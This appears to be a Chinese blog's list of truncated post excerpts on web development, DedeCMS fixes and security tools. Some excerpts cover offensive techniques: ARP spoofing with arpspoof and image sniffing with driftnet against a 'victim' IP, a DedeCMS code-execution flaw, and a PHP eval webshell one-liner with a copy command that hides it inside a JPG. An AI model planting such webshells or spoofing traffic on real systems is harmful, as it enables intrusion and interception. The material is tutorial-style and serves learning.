摘要:
现在很多网站不仅是介绍,更多的是有一些功能,怎么样让客户快速的知道网站有哪些功能呢?这里pagewalkthrough.js插件能帮我们实现,它是一个轻量级的jQuery插件,它可以帮助我们创建一个遮罩引导层,实现页面功能引导功能,引导完成显示页面内容。 下载源码 html代码: <div id=" 阅读全文
摘要:
driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片环境 受害ip:192.168.228.130 攻击ip:192.168.228.129 网关:192.168.228.2 条件 1,开启或关闭IP转发 2,向被攻击机器发送 阅读全文
摘要:
终端执行下面命令来安装: sudo apt-get install -y dsniff ssldump 安装成功后,即可在终端运行arpspoof man手册:http://manpages.ubuntu.com/manpages/xenial/man8/arpspoof.8.html 参考:Lin 阅读全文
摘要:
问题文件:在/include/dialog/select_soft_post.php文件 解决方法: 先找到这个文件/include/dialog/select_soft_post.php,找到大概72,73行的 $fullfilename = $cfg_basedir.$activepath.'/ 阅读全文
摘要:
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。 DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木 阅读全文
摘要:
DEDECMS织梦的后台在登录的时候会要求输入验证码,如图所示。这也是为了防止其他人恶意攻击网站。但是有的人觉得每次登录后台输入验证码太麻烦,那也可以去掉,这个不是太大的问题,只要网站数据库以及密码保护好,一般不会有太大的安全问题。接下来我说一下方法。 删除织梦后台登录验证码的方法: 1、在www> 阅读全文
摘要:
我的需求是:我有一个128G的U盘,想把kali2安装在其中还要挖出一块当普通U盘储存其它数据, 准备工作:1、虚拟机,我用的是VMware Workstation pro 14 2、kali2 镜像文件,2018.3,可以去官网下载 3、128G的U盘,3.0的 4、磁盘分区工具DiskGeniu 阅读全文
摘要:
转自:https://www.genban.org/news/dedecms-6224.html DedeCMS注册会员上传附件时会提示“需输入后台管理目录才能登录” 解决办法: 第一步:找到程序目录include\dialog\config.php下文件。其中有段代码: //检验用户登录状态$cu 阅读全文
摘要:
<script>$(function(){ var arr = new Array( "static/picture/zf.jpg", "static/picture/gf.jpg", "static/picture/qi.jpg", ); var object= document.getEleme 阅读全文
摘要:
新建一个文件夹 在其中放入一张图片文件tp.jpg,和yjh.php一句话木马 yjh.php中的一句话木马内容为<?php @eval($_POST[yjh]);?>和一个写入cmd的bat文件点击bat文件进入DOS命令,写入"copy tp.jpg/b+yjh.php tpyjh.jpg" 回 阅读全文